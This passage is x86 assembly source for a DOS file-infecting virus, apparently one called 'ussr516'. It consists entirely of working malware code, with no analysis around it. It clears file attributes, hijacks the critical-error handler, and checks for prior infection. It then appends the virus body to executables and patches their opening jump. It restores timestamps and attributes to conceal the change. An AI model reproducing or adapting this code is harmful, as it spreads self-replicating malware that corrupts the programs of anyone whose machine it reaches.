                pop     ds
                mov     ax,3301h                       ; Turn off ^C check
                xor     dl,dl                          ; (never turn it back
                call    int21                          ;  on.  Bug???)
                mov     ax,3524h                       ; Get int 24h
                call    int21                          ; (Critical error)
                mov     [bp-8],bx
                mov     [bp-6],es
                mov     dx,int24-start
                mov     ax,2524h                       ; Set to new one
                call    int21
                mov     ax,4300h                       ; Get attributes
                call    int21DSDX
                jnc     continue
doneinfect:
                mov     ax,2524h                       ; Restore crit error
                lds     dx,dword ptr [bp-8]            ; handler
                call    int21
                cli
                mov     sp,bp
                pop     bp
                pop     dx
                pop     ds
                pop     bx
                pop     es
                pop     cx
                pop     ax
                jmp     short callorig21               ; Call orig handler
continue:
                mov     [bp-0Ah],cx                    ; Save attributes
                test    cl,1                           ; Check if r/o????
                jz      noclearattr
                xor     cx,cx
                mov     ax,4301h                       ; Clear attributes
                call    int21DSDX                      ; Filename in DS:DX
                jc      doneinfect                     ; Quit on error
noclearattr:
                mov     ax,3D02h                       ; Open read/write
                call    int21DSDX                      ; Filename in DS:DX
                jc      doneinfect                     ; Exit if error
                mov     bx,ax
                mov     ax,5700h                       ; Save time/date
                call    int21
                mov     [bp-4],cx
                mov     [bp-2],dx
                mov     dx,buffer-start
                mov     cx,4
                mov     ah,3Fh                         ; Read 4 bytes to
                call    int21                          ; buffer
                jc      quitinf
                cmp     byte ptr ds:[buffer-start],0E9h; Must start with 0E9h
                jne     quitinf                        ; Otherwise, quit
                mov     dx,word ptr ds:[buffer+1-start]; dx = jmploc
                dec     dx
                xor     cx,cx
                mov     ax,4201h                       ; go there
                call    int21
                mov     ds:[buffer-start],ax           ; new location offset
                mov     dx,orig4-start
                mov     cx,4
                mov     ah,3Fh                         ; Read 4 bytes there
                call    int21
                mov     dx,ds:[orig4-start]
                cmp     dl,0E9h                        ; 0E9h means we might
                jne     infect                         ; already be there
                mov     ax,ds:[orig4+2-start]          ; continue checking
                add     al,dh                          ; to see if we really
                sub     al,ah                          ; are there.
                jz      quitinf
infect:
                xor     cx,cx
                mov     dx,cx
                mov     ax,4202h                       ; Go to EOF
                call    int21
                mov     ds:[buffer+2-start],ax         ; save filesize
                mov     cx,204h
                mov     ah,40h                         ; Write virus
                call    int21
                jc      quitinf                        ; Exit if error
                sub     cx,ax
                jnz     quitinf
                mov     dx,ds:[buffer-start]
                mov     ax,ds:[buffer+2-start]
                sub     ax,dx
                sub     ax,3                           ; AX->jmp offset
                mov     word ptr ds:[buffer+1-start],ax; Set up buffer
                mov     byte ptr ds:[buffer-start],0E9h; code the jmp
                add     al,ah
                mov     byte ptr ds:[buffer+3-start],al
                mov     ax,4200h                       ; Rewind to jmploc
                call    int21
                mov     dx, buffer-start
                mov     cx,4                           ; Write in the jmp
                mov     ah,40h
                call    int21
quitinf:
                mov     cx,[bp-4]
                mov     dx,[bp-2]
                mov     ax,5701h                       ; Restore date/time
                call    int21
                mov     ah,3Eh                         ; Close file
                call    int21
                mov     cx,[bp-0Ah]                    ; Restore attributes
                mov     ax,4301h
                call    int21DSDX
                jmp     doneinfect                     ; Return
ussr516         ends
                end     stub